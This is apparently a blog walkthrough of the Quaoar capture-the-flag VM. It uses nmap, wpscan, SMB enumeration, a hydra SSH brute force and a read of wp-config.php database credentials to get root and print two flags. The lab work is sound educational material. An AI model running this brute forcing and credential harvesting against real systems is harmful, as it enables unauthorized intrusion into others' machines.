For anyone interested in Penetration Testing and IT Security, there is the need to test the theoretical skills you might have acquired. To give people who are interested a means to do so without violating the law, Capture-the-Flag (CTF) Images exist. A CTF challenge is (usually) a virtual machine especially crafted with security vulnerabilities in it. The flags are text files that you must discover.
Previously, we solved the LazySysAdmin CTF challenge – today we’re using the Quaoar VM from vulnhub.
To get this VM, either to tag along while reading or if you’re interested and want to solve it by yourself, download it and import it into VirtualBox. A word of advice: Never let a downloaded VM directly into your network. Use a host-only network to reach the virtual machine from your host machine.
But now, let’s get started!
Remember to save anything that looks like it’s a username or could be a password in a file. This information might be useful later on.
The Quaoar-VM is set up to use the network adapter vboxnet0. So as a first step, we need to find it on the network.
$ netdiscover -i vboxnet0 192.168.99.101
As we’ll need that IP Adress a few times, I’ll export it to save myself some typing.
$ export IP=192.168.99.101
Now we can use $IP instead of typing it out all the time.
To get a general overview of the target machine, the ports are enumerated with
$ nmap -A $IP Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 21:51 CET Nmap scan report for 192.168.99.101 Host is up (0.0020s latency). Not shown: 991 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0) [...] 53/tcp open domain ISC BIND 9.8.1-P1 [...] 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_Hackers |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 110/tcp open pop3 Dovecot pop3d [...] 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd |_imap-capabilities: LOGINDISABLEDA0001 more IMAP4rev1 listed post-login have SASL-IR ID ENABLE STARTTLS capabilities LITERAL+ Pre-login IDLE OK LOGIN-REFERRALS | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server [...] 445/tcp open netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP) 993/tcp open ssl/imap Dovecot imapd |_imap-capabilities: AUTH=PLAINA0001 IMAP4rev1 more post-login have SASL-IR ID ENABLE listed capabilities LITERAL+ Pre-login IDLE OK LOGIN-REFERRALS | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server [...] 995/tcp open ssl/pop3 Dovecot pop3d |_pop3-capabilities: PIPELINING TOP UIDL SASL(PLAIN) USER CAPA RESP-CODES | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server [...] Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s |_nbstat: NetBIOS name: QUAOAR, NetBIOS user: , NetBIOS MAC: (unknown) | smb-os-discovery: | OS: Unix (Samba 3.6.3) | NetBIOS computer name: | Workgroup: WORKGROUP\x00 |_ System time: 2017-11-06T16:51:39-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.02 seconds
So we got to know quite a lot about the system. We have open ports for
pop3 – among others. We also know there is an
apache webserver running on port
80 and according to the
robots.txt there is a wordpress installation.
Let’s see what
wpscan tells us about that wordpress instance:
$ wpscan --url $IP _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 2.9.3 Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_ _______________________________________________________________ [+] URL: http://192.168.99.101/wordpress/ [+] Started: Mon Nov 6 21:55:33 2017 [!] The WordPress 'http://192.168.99.101/wordpress/readme.html' file exists exposing a version number [+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu) [+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3 [+] XML-RPC Interface available under: http://192.168.99.101/wordpress/xmlrpc.php [!] Upload directory has directory listing enabled: http://192.168.99.101/wordpress/wp-content/uploads/ [!] Includes directory has directory listing enabled: http://192.168.99.101/wordpress/wp-includes/ [+] WordPress version 3.9.14 (Released on 2016-09-07) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers [!] 20 vulnerabilities identified from the version number [!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php Reference: https://wpvulndb.com/vulnerabilities/8716 [...] [i] Fixed in: 3.9.15 [!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback Reference: https://wpvulndb.com/vulnerabilities/8718 [...] [i] Fixed in: 3.9.15 [!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default Reference: https://wpvulndb.com/vulnerabilities/8719 [...] [i] Fixed in: 3.9.15 [!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF) Reference: https://wpvulndb.com/vulnerabilities/8720 [...] [i] Fixed in: 3.9.15 [!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG) Reference: https://wpvulndb.com/vulnerabilities/8721 [...] [i] Fixed in: 3.9.15 [!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection Reference: https://wpvulndb.com/vulnerabilities/8730 [...] [i] Fixed in: 3.9.16 [!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata Reference: https://wpvulndb.com/vulnerabilities/8765 [...] [i] Fixed in: 3.9.17 [!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation Reference: https://wpvulndb.com/vulnerabilities/8766 [...] [i] Fixed in: 3.9.17 [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset Reference: https://wpvulndb.com/vulnerabilities/8807 [...] [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation Reference: https://wpvulndb.com/vulnerabilities/8815 [...] [i] Fixed in: 3.9.19 [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC Reference: https://wpvulndb.com/vulnerabilities/8816 Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/ [...] [i] Fixed in: 3.9.19 [!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks Reference: https://wpvulndb.com/vulnerabilities/8817 [...] [i] Fixed in: 3.9.19 [!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF Reference: https://wpvulndb.com/vulnerabilities/8818 [...] [i] Fixed in: 3.9.19 [!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS Reference: https://wpvulndb.com/vulnerabilities/8819 [...] [i] Fixed in: 3.9.19 [!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF Reference: https://wpvulndb.com/vulnerabilities/8820 [...] [i] Fixed in: 3.9.19 [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection Reference: https://wpvulndb.com/vulnerabilities/8905 [...] [i] Fixed in: 3.9.20 [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection Reference: https://wpvulndb.com/vulnerabilities/8906 [...] [i] Fixed in: 4.7.5 [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect Reference: https://wpvulndb.com/vulnerabilities/8910 [...] [i] Fixed in: 3.9.20 [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping Reference: https://wpvulndb.com/vulnerabilities/8911 [...] [i] Fixed in: 3.9.20 [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness Reference: https://wpvulndb.com/vulnerabilities/8941 [...] [i] Fixed in: 3.9.21 [+] WordPress theme in use: twentyfourteen - v1.1 [+] Name: twentyfourteen - v1.1 | Last updated: 2017-06-08T00:00:00.000Z | Location: http://192.168.99.101/wordpress/wp-content/themes/twentyfourteen/ [!] The version is out of date, the latest version is 2.0 | Style URL: http://192.168.99.101/wordpress/wp-content/themes/twentyfourteen/style.css | Referenced style.css: wp-content/themes/twentyfourteen/style.css | Theme Name: Twenty Fourteen | Theme URI: http://wordpress.org/themes/twentyfourteen | Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des... | Author: the WordPress team | Author URI: http://wordpress.org/ [+] Enumerating plugins from passive detection ... [+] No plugins found [+] Finished: Mon Nov 6 21:55:37 2017 [+] Requests Done: 49 [+] Memory used: 32.5 MB [+] Elapsed time: 00:00:03
Ok, that’s quite a lot of information. To process. But before focussing too much on wordpress, we’ll stick to enumeration for now. Let’s take a look at the samba-shares.
Enumerate the users first. Luckily, there’s a nmap-script for that:
$ nmap --script smb-enum-users.nse -p 445 $IP Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 21:58 CET Nmap scan report for 192.168.99.101 Host is up (0.00089s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-users: | QUAOAR\nobody (RID: 501) | Full name: nobody | Description: | Flags: Normal user account | QUAOAR\root (RID: 1001) | Full name: root | Description: | Flags: Normal user account | QUAOAR\viper (RID: 1000) | Full name: viper | Description: | Flags: Normal user account | QUAOAR\wpadmin (RID: 1002) | Full name: | Description: |_ Flags: Normal user account
Ok. So we see some usernames:
wpadmin. We’ll take note of them. Now we can check if there are any shares accessible:
$ nmap --script smb-enum-shares.nse -p 445 $IP Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-06 22:01 CET Nmap scan report for 192.168.99.101 Host is up (0.00067s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-shares: | account_used: guest | \\192.168.99.101\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (Quaoar server (Samba, Ubuntu)) | Users: 1 | Max Users: | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\192.168.99.101\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: | Path: C:\var\lib\samba\printers | Anonymous access: |_ Current user access: Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds
This looks like we’re on to something here. A guest share with read/write access! We can now try to connect to that share!
$ smbclient //$IP/IPC$ -N
The prompt changes. Looks like we’re in!
Unfortunately, we can’t do anything on here:
smb: \> dir NT_STATUS_ACCESS_DENIED listing \*
Let’s leave that trace for now. We gathered quite a lot of information already and can try to gain access with the information.
With everything we discovered so far, we’re ready to take hydra for a spin and check if we already have valid credentials. Hydra is a login cracker that supports a lot of common protocols. The
is the file where I saved everything that looked like a user account or a possible password during enumeration.
$ hydra -L info.txt -P info.txt -u $IP ssh -t 4 [ssh] host: 192.168.99.101 login: wpadmin password: wpadmin
Ok, we got our entry point!
$ ssh wpadmin@$IP
Let’s check if we have any interesting groups assigned.
$ id uid=1001(wpadmin) gid=1001(wpadmin) groups=1001(wpadmin)
Nothing. But we have our first flag.
$ ls flag.txt
$ cat flag.txt 2bafe61f03117ac66a73c3c514de796e
It’s safe to assume the user
wpadmin has at least read-rights for the
wordpress installation. Let’s check it out and see if we get some more information!
cd /var/www/wordpress cat wp-config.php | grep DB_ define('DB_NAME', 'wordpress'); define('DB_USER', 'root'); define('DB_PASSWORD', 'rootpassword!'); define('DB_HOST', 'localhost'); define('DB_CHARSET', 'utf8'); define('DB_COLLATE', '');
Another password, great! Let’s see, if this is the real root password for this box:
$ ssh root@$IP firstname.lastname@example.org's password: Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686) * Documentation: https://help.ubuntu.com/ System information as of Mon Nov 6 18:40:50 EST 2017 System load: 0.47 Processes: 95 Usage of /: 29.9% of 7.21GB Users logged in: 0 Memory usage: 32% IP address for eth0: 192.168.99.101 Swap usage: 0% IP address for virbr0: 192.168.122.1 Graph this data and manage this system at https://landscape.canonical.com/ New release '14.04.5 LTS' available. Run 'do-release-upgrade' to upgrade to it. Last login: Sun Jan 15 11:23:45 2017 from desktop-g0lhb7o.snolet.com
OK, let’s see.
root@Quaoar:~# ls flag.txt vmware-tools-distrib
Now we have the second flag.
root@Quaoar:~# cat flag.txt 8e3f9ec016e3598c5eec11fd3d73f6fb
We got it. Time to take a step back and have a look what we learned during the penetration test of this VM:
- Enumeration is key. There’s a lot information hidden in plain sight.
- If you’re running any sort of service, don’t reuse passwords.
- Disable everything you do not need on your systems.